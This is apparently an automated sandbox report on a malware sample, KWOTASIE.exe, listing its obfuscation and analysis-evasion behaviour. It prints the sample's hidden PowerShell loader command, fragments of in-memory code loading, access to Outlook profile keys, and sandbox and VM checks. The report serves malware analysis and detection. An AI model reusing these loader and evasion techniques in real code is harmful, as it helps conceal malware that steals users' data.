            Source: C:\Users\user\Desktop\KWOTASIE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: KWOTASIE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Tilbagebetalingen $underdegreed $Knaggy), (Implicated @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:dragsterne = [AppDomain]::CurrentDomain.GetAssemblies
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Valters)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Madrasah, $false).DefineType($Bonne, $Vingesuset,
            Source: C:\Users\user\Desktop\KWOTASIE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"
            Source: C:\Users\user\Desktop\KWOTASIE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"Jump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 61D9EB7
            Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 330000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 21AF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 23AF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6309Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3476Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 8483Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1375Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -25825441703193356s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3572Thread sleep count: 8483 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3572Thread sleep count: 1375 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -99766s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -99656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -99547s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -99437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -99328s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -99219s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -99109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -99000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -98891s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -98781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -98672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -98562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -98453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -98344s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -98234s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -98125s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -98016s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -97900s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -97781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -97672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -97562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -97453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -97344s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -97219s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -97109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -97000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -96890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -96781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -96672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -96562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -96453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -96344s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -96219s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -96109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -96000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -95891s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -95781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -95672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -95562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -95453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -95344s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -95234s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -95125s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -95014s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -94891s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -94766s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -94656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092Thread sleep time: -94534s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Users\user\Desktop\KWOTASIE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
